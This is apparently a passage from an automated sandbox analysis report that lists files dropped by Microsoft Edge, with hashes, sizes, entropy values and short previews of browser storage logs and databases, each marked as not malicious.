                                                                                                                                                                                                                                                                          SSDEEP:6:BaJFIq2PN723oH+Tcwt8a2jMGIFUt8UaSqU9Zmw+UacJFkwON723oH+Tcwt8a2jz:BzvVaYeb8EFUt8UUU9/+UXX5OaYeb8bJ
                                                                                                                                                                                                                                                                          MD5:74DECC26BE36273159339CD46D0FC480
                                                                                                                                                                                                                                                                          SHA1:501182EFBE243EEF3ECB9392446A9FC2D25C9C95
                                                                                                                                                                                                                                                                          SHA-256:10ADD6A425C8946D6958346D3C26C0F873C97FA0246241E5F985F5AEFABC54EA
                                                                                                                                                                                                                                                                          SHA-512:22B131DC2FE68AC36BE96B82A69DD45D9CD6B916E77393784CFCC56AFA0EDD0ADA4434DEAC966DAE4C88CC0D8DCC14714E20EB866A920DD02DF26C8394C68B87
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.486 514 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/12/27-01:11:05.487 514 Recovering log #3.2024/12/27-01:11:05.489 514 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):0.8350301952073809
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
                                                                                                                                                                                                                                                                          MD5:0DAD8D7F079797377CD56DAE47E1A619
                                                                                                                                                                                                                                                                          SHA1:A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
                                                                                                                                                                                                                                                                          SHA-256:7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
                                                                                                                                                                                                                                                                          SHA-512:5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):242
                                                                                                                                                                                                                                                                          Entropy (8bit):4.356737152904909
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:S85aEFljljljljlcQlllaV93Jiwv8qedUV:S+a8ljljljljl1lcD8XW
                                                                                                                                                                                                                                                                          MD5:15CFC898C6B74000F96F55270CD7C3EC
                                                                                                                                                                                                                                                                          SHA1:8E59035E62422D8C2D8E2C5EDC95D636A0C66DE7
                                                                                                                                                                                                                                                                          SHA-256:D6065F5D9092C88BD835B7485ECF4FB814A67C24020AA2BC8FFC743895399039
                                                                                                                                                                                                                                                                          SHA-512:123A22B32B8C1A4D56118B680FDEA131406D615DBDC3DEA82BEC4008933BFAB05870FED3699B410A75E6D9993717ACD952140922F05FF1B3E8A299EA6013E681
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f...................b................next-map-id.1.Cnamespace-a3899006_d8bd_4d47_91df_9f04a4290019-https://ntp.msn.com/.0
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):325
                                                                                                                                                                                                                                                                          Entropy (8bit):5.089611823463568
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BNOq2PN723oH+TcwtrQMxIFUt8UnFZZmw+UbFkwON723oH+TcwtrQMFLJ:BcvVaYebCFUt8UnFZ/+UbF5OaYebtJ
                                                                                                                                                                                                                                                                          MD5:5C36E6A3DBFE19B2F9880C0DFD854BEA
                                                                                                                                                                                                                                                                          SHA1:49FB3E06F1295664649D2CE6FA9D4DBD0B2502AC
                                                                                                                                                                                                                                                                          SHA-256:467AA74A545CDBBB7092283E9BDB0597C38BE2D72B71763EF956D6699AB2B333
                                                                                                                                                                                                                                                                          SHA-512:4A6E4B8603EC3A500026A740FFD243C41E166F4EBDDF751751C335938269262E6FE0597AE3C1B3652388769E35FA4CA0DC19381B5351AEC55FBCB2B873A8C601
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.470 514 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/27-01:11:05.472 514 Recovering log #3.2024/12/27-01:11:05.476 514 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1443
                                                                                                                                                                                                                                                                          Entropy (8bit):3.841395052977094
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:3ip/+4ZFePFB4ZP98PFnpsAF4unxmtLp3X2amEtG1Chq2Skw3A3QKkOAM4:3ip/+i+B+P9QnzFYLp2FEkChI3AgHOp
                                                                                                                                                                                                                                                                          MD5:784390EF033FAE77AF3F5A7FC2B347DC
                                                                                                                                                                                                                                                                          SHA1:7F99C27E67FBE73B811C9E07DD275EC5AA55F6EE
                                                                                                                                                                                                                                                                          SHA-256:2CCAC8236804B11AF3B5BA451583DBFDD16B8C49A504BF95CC402E6AFB3B38C8
                                                                                                                                                                                                                                                                          SHA-512:7BC9F973591272B8B20A64466A0DB6C3D833A029DCEB30EC2F4398D88E2D38A2B53F38E97633EA6E21E23264884D52344A69EB933B563F00EB88664D19E322AD
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SNSS........#.*............#.*......".#.*............#.*........#.*........#.*........#.*....!...#.*................................#.*.#.*1..,....#.*$...a3899006_d8bd_4d47_91df_9f04a4290019....#.*........#.*................#.*....#.*........................#.*....................5..0....#.*&...{46F3A197-DB49-410A-81B3-94975C835573}......#.*........#.*...........................#.*............#.*........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x........>"T:*...>"T:*.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                          Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                          MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                          SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                          SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                          SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):356
                                                                                                                                                                                                                                                                          Entropy (8bit):5.096032413250271
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:B7L+q2PN723oH+Tcwt7Uh2ghZIFUt8UHWRsG11Zmw+UHWRsGjLVkwON723oH+Tcz:B7L+vVaYebIhHh2FUt8UHWRsm/+UHWRw
                                                                                                                                                                                                                                                                          MD5:0612FEAF0708E223126217728628156F
                                                                                                                                                                                                                                                                          SHA1:7BDEA2F62E00E0CEEB737541E580CFFAF98410E2
                                                                                                                                                                                                                                                                          SHA-256:17FE50D4B42B248B026E686070F186A79CE051A6956A71F42B2E463D649D27DC
                                                                                                                                                                                                                                                                          SHA-512:4D0AB9FE6D0046D840F56448610E856588CE2C92153F937B79669AA5F66E529F6EEB5F44BDF70F837F073FCD5DA143D231A6E2629671A5615376388F6742C040
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:04.707 137c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/27-01:11:04.834 137c Recovering log #3.2024/12/27-01:11:04.834 137c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):435
                                                                                                                                                                                                                                                                          Entropy (8bit):5.2053845045341
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:ByQIOvVaYebvqBQFUt8Ua9/+UwD5OaYebvqBvJ:MnMVaYebvZg84OaYebvk
                                                                                                                                                                                                                                                                          MD5:350D4B3E97417DFEFDB8000554A61E08
                                                                                                                                                                                                                                                                          SHA1:D05BC8E73F8DDA6984A05C4DC43015C579081BAC
                                                                                                                                                                                                                                                                          SHA-256:B64CBCECD284E8276018722E13BAA456C95CB7F56A5D969A3E3ADAB5DDF961ED
                                                                                                                                                                                                                                                                          SHA-512:F4FDDB46EA1A789F11851ADCF3E6EBA9DE1B809548EB95652864204E58089F774C955003FEB4FCF8E3A31AA3E21FA54738B725E56B7A47A1A57CFA6DE67AAB31
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.509 514 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/27-01:11:05.510 514 Recovering log #3.2024/12/27-01:11:05.518 514 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):36864
                                                                                                                                                                                                                                                                          Entropy (8bit):0.3886039372934488
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
                                                                                                                                                                                                                                                                          MD5:DEA619BA33775B1BAEEC7B32110CB3BD
                                                                                                                                                                                                                                                                          SHA1:949B8246021D004B2E772742D34B2FC8863E1AAA
                                                                                                                                                                                                                                                                          SHA-256:3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
                                                                                                                                                                                                                                                                          SHA-512:7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):2
                                                                                                                                                                                                                                                                          Entropy (8bit):1.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:H:H
                                                                                                                                                                                                                                                                          MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                                                                                                          SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                                                                                                          SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                                                                                                          SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:[]
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):332
                                                                                                                                                                                                                                                                          Entropy (8bit):5.195340065955111
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BHWTx+q2PN723oH+TcwtpIFUt8UHqHZZmw+UHqHNVkwON723oH+Tcwta/WLJ:BHWgvVaYebmFUt8UHq5/+UHqT5OaYeb7
                                                                                                                                                                                                                                                                          MD5:B94327D7682CC4F28952D9B200EBC586
                                                                                                                                                                                                                                                                          SHA1:E5CDFDAD30A38C8933A08E7E95DFEA71DFC7BA79
                                                                                                                                                                                                                                                                          SHA-256:9E08F97E6C9C159F57F5C3DBD66754436080750F601B3CC24A9335138FEF17AE
                                                                                                                                                                                                                                                                          SHA-512:1F6B7586AF817B102B95296B6618A275EC9A7EA6DCEF9F484F2C75AF47502463BEFA54BFDD3A0903CB5CB2CE1CF28C8634836AB00E04229B12B405D6C0C15630
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:04.836 1388 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2024/12/27-01:11:04.845 1388 Recovering log #3.2024/12/27-01:11:04.845 1388 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x37, schema 4, UTF-8, version-valid-for 10
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):196608
                                                                                                                                                                                                                                                                          Entropy (8bit):1.2676416689747718
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:384:L/2qOB1nxCkMXSA1LyKOMq+8iP5GDHP/0jMVumw:Kq+n0JX91LyKOMq+8iP5GLP/01
                                                                                                                                                                                                                                                                          MD5:9C72978D62707A972C39A9C1314D4C4C
                                                                                                                                                                                                                                                                          SHA1:18C5BDD0D83CDBF89F1C83C5B0A02376E8F9CF36
                                                                                                                                                                                                                                                                          SHA-256:36AC5B2F92DFD04A55E7AB76FCB5FE6C1641B42861D62B45F88368A9ED6CC67E
                                                                                                                                                                                                                                                                          SHA-512:831EBEE8D45358AEBCFCBD72939116BA5509434E18C640DADF576CC7DEB9C26D2681D74BA42BBA2ABE446EDBC52BD1B670DE462078DA437DA788367CF433A179
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:SQLite format 3
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:.
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):32768
                                                                                                                                                                                                                                                                          Entropy (8bit):0.053340852838337546
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:GtStut/nB9uIPStut/nB9uQR9XCChslotGLNl0ml/Vl/XoQXEl:Mt/jumt/juQLpEjVl/PvoQ
                                                                                                                                                                                                                                                                          MD5:0260AE683A2E5C08B8149A334FE191AF
                                                                                                                                                                                                                                                                          SHA1:5D495C7CF6C55643903FA7306B0BFD3369E7CF46
                                                                                                                                                                                                                                                                          SHA-256:6F20E20464DACB34691A7AE2D2BA9A21BB3B688A513C620A9B1E9ADFC3E47D73
                                                                                                                                                                                                                                                                          SHA-512:B2134406E210F07AB3DDED047A50182786C17EE33FF449B6BBC5275758ED12EE7D086CDD1E7EA0A048B5D42B2F89F8210A42125073ECCC9886824CAA2C9217E5
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):86552
                                                                                                                                                                                                                                                                          Entropy (8bit):0.87053602712582
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:48:eqzxjlO+H1qcbX+En9VAKAFXX+pRw2VAKAFXX+6xOqVAKAFXX+GnUYVAKAFXX+aV:e6xLV0xNs/cNswO5NshNsaV
                                                                                                                                                                                                                                                                          MD5:550E757D140C4C4AC0299ECE917C0CC8
                                                                                                                                                                                                                                                                          SHA1:F1262B7ECDECB39CB7D6FBBCB26C5A7852A76808
                                                                                                                                                                                                                                                                          SHA-256:306575ED21EF7EBB48C8737CB7F5A8AF3028E2C788FB795AAAD02A27448AB52C
                                                                                                                                                                                                                                                                          SHA-512:D3A49469B37F26F11ECB37DA1D1C6EEFB2C081FEAC96AD3D88F451AA0DE88E35349D4E6465642A3C89814B0433D11F96758A436939E4986419B6849CFA017E33
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                          Size (bytes):620
                                                                                                                                                                                                                                                                          Entropy (8bit):3.2854596157347293
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuCKgllxtbX:pHayjgl
                                                                                                                                                                                                                                                                          MD5:1B0ABF26ECB7AD23A3129AEA6117AD86
                                                                                                                                                                                                                                                                          SHA1:7278A9A8030A5335C1E75DD25B1E7AAB512C6559
                                                                                                                                                                                                                                                                          SHA-256:9BF23E8D27FCD6BBBD54D5F945E73D6BD4ACE7F18473F8C2516C640D7615FF15
                                                                                                                                                                                                                                                                          SHA-512:17720210FC84B811762D3DB360BDF60F40B61B0C61DC528E2674DC6AFE0BDD8BE96B125AF7646991D36D55C9F908B646785CA538B99398E1A9C716C6A6FE7D3E
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):328
                                                                                                                                                                                                                                                                          Entropy (8bit):5.217600499855756
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BGGjM+q2PN723oH+TcwtfrK+IFUt8UGpmZmw+UGppMVkwON723oH+TcwtfrUeLJ:BbjM+vVaYeb23FUt8UJ/+UcMV5OaYeb5
                                                                                                                                                                                                                                                                          MD5:3B250B897058F788C913A7E7E99FB75D
                                                                                                                                                                                                                                                                          SHA1:21BE1F0E72327A0B031DBB91E660F36206CD02C2
                                                                                                                                                                                                                                                                          SHA-256:907F808866FEEEC0DBC9AC21BA32C9BCFB2F01B413558F0164261CE3A9857F9D
                                                                                                                                                                                                                                                                          SHA-512:5338FF22CB6D6009137B55B595AD7D0B663E000149792DFA01D445F2E504139F5E64F703CB142DAB5E9F15AA904654A705244E4FC57C418067D5A442EC85C4D7
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.263 138c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/27-01:11:05.264 138c Recovering log #3.2024/12/27-01:11:05.264 138c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):816
                                                                                                                                                                                                                                                                          Entropy (8bit):4.0647916882227655
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
                                                                                                                                                                                                                                                                          MD5:3BE72D8D40752B3A97028FDB2931FABA
                                                                                                                                                                                                                                                                          SHA1:A27EA4726857A948F0A4B074062B674469A9A371
                                                                                                                                                                                                                                                                          SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
                                                                                                                                                                                                                                                                          SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                          Size (bytes):346
                                                                                                                                                                                                                                                                          Entropy (8bit):5.18872718047005
                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                          SSDEEP:6:BGzM+q2PN723oH+TcwtfrzAdIFUt8UGlNXZmw+UGlNqMVkwON723oH+TcwtfrzId:B4M+vVaYeb9FUt8UO/+UxMV5OaYeb2J
                                                                                                                                                                                                                                                                          MD5:81CF18BFC18610405013FC004B0E036C
                                                                                                                                                                                                                                                                          SHA1:D3BB054452BD20F33873F9697743329711FE8B2F
                                                                                                                                                                                                                                                                          SHA-256:FCC2896BB6D85F8129094652EF9B9759519571C8A2B5390F092A9E1F52871C46
                                                                                                                                                                                                                                                                          SHA-512:DE0972BC952978E5596582FCF4DD5CBFAE6B7881DB1E774EC3E676A962A38975D00BD29014461B1203642D931EFAE932FCE5564D9262F2F260695ED5E3D1ACB8
                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                          Preview:2024/12/27-01:11:05.260 138c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/27-01:11:05.261 138c Recovering log #3.2024/12/27-01:11:05.261 138c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
